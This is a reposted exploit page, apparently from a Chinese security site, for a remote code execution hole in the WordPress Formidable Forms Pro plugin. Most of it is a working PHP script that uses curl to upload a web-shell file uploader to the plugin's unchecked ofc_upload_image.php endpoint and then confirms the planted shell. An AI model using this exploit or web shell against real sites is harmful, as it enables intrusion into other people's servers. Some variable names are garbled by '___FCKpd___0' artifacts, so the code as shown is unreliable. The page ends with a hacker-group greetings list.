首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WordPress Formidable Forms Remote Code Execution
来源:IndiShell LAB 作者:Tanwar 发布时间:2014-05-14  
##############################################################################################
# Exploit Title   : wordpress plugin "Formidable Forms" Remote code execution exploit
# Exploit Author  : Manish Kishan Tanwar
# vendor Link     : http://wordpress.org/plugins/formidable/
# Version Affected: below verson 1.06.03(only pro version)
# Discovered At   : IndiShell LAB (indishell.in aka indian cyber army)
# Love to         : zero cool,Team indishell,Hardeep Singh
##############################################################################################


////////////////////////////////////
POC Remote code Execution
////////////////////////////////////
this Plugin is vulnerable to remote code execution exploit because of ofc_upload_image.php file parameters (
___FCKpd___0
GET[ 'name' ] and $HTTP_RAW_POST_DATA) there is no security check on these parameters and can be exploited by attacker vulnerable link http://127.0.0.1/wordpress/wp-content/plugins/formidable/pro/js/ofc-library/ofc_upload_image.php shell will be here http://127.0.0.1/wordpress/wp-content/plugins/formidable/pro/js/tmp-upload-images/shell.php /////////////////////// /// exploit code //// /////////////////////// <!--exploit code by Team INDISHELL(Manish Tanwar)--> <?php $web="http://127.0.0.1"; $shell="ica_shell.php"; $file="wp-content/plugins/formidable/pro/js/ofc-library/ofc_upload_image.php?name="; $up="/wp-content/plugins/formidable/pro/js/tmp-upload-images/"; $upshell=$up.$shell; $data = '<?php echo "<body bgcolor=black>"; echo "<p><div align=center><font color=#ff9933 font size=6> <3 INDI</font><font color=white font size=6>SHELL</font><font color=green font size=6>=FTW <3 </font><p><form method=post enctype=multipart/form-data name=uploader >"; echo "<input type=file name=file size=50>&nbsp&nbsp&nbsp&nbsp<input type=submit name=sut value=Upload></form>"; if( isset(
___FCKpd___0
POST[\'sut\']) ) { if(@copy(
___FCKpd___0
FILES[\'file\'][\'tmp_name\'],
___FCKpd___0
FILES[\'file\'][\'name\'])) { echo "<font color=red size=2 face=\"comic sans ms\">upload done :D<br><br>"; } else { echo "<font color=red size=2 face=\"comic sans ms\">Upload failed :P<br>"; } } ?>'; $link=$web; $target = trim($link.$file.$shell); $fshell=$link.$upshell; $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 'Content-Type: text/plain'); $handle = curl_init(); curl_setopt($handle, CURLOPT_URL, $target); curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); curl_setopt($handle, CURLOPT_POSTFIELDS, $data); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $source = curl_exec($handle); curl_close($handle); if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($fshell, 'r')) { echo "shell has been uploaded :D here is shell link<br><a href= ".$fshell.">".$fshell."</a>"; } else { echo "sorry :( "; } ?> ///////////////////// end of exploit code //////////////////// --==[[ Greetz To ]]==-- ############################################################################################################################################ Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi ethicalnoob Indishell,Local root indishell,Irfninja indishell,Reborn India,L0rd Crus4d3r,cool toad,cool shavik,Hackuin,Alicks,Ebin V Thomas Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoozoo,The creator,cyber warrior,Neo hacker ICA,Suriya Prakash cyber gladiator,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen lovetherisk,brown suger and rest of TEAM INDISHELL ############################################################################################################################################ --==[[Love to]]==-- # My Father , my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand ,Budhaoo,Anju Gulia,Don(Deepika kaushik) and acche bacchi(Jagriti) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel 3.3-3.8 - SOCK_DI
·AlienVault OSSIM 4.6.1 - Authe
·Easy File Sharing Web Server 6
·Easy Chat Server 3.1 - Stack B
·TFTPD32 4.5 / TFTPD64 4.5 - Do
·Yokogawa CS3000 BKESimmgr.exe
·Linux Kernel 3.15-rc4 PTY Race
·Drupal Flag 7.x-3.5 Command Ex
·K-Lite CODEC 10.45 Memory Corr
·Jet Audio 8.1.1 Memory Corrupt
·ElasticSearch Remote Code Exec
·VLC Player 2.1.3 Memory Corrup
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved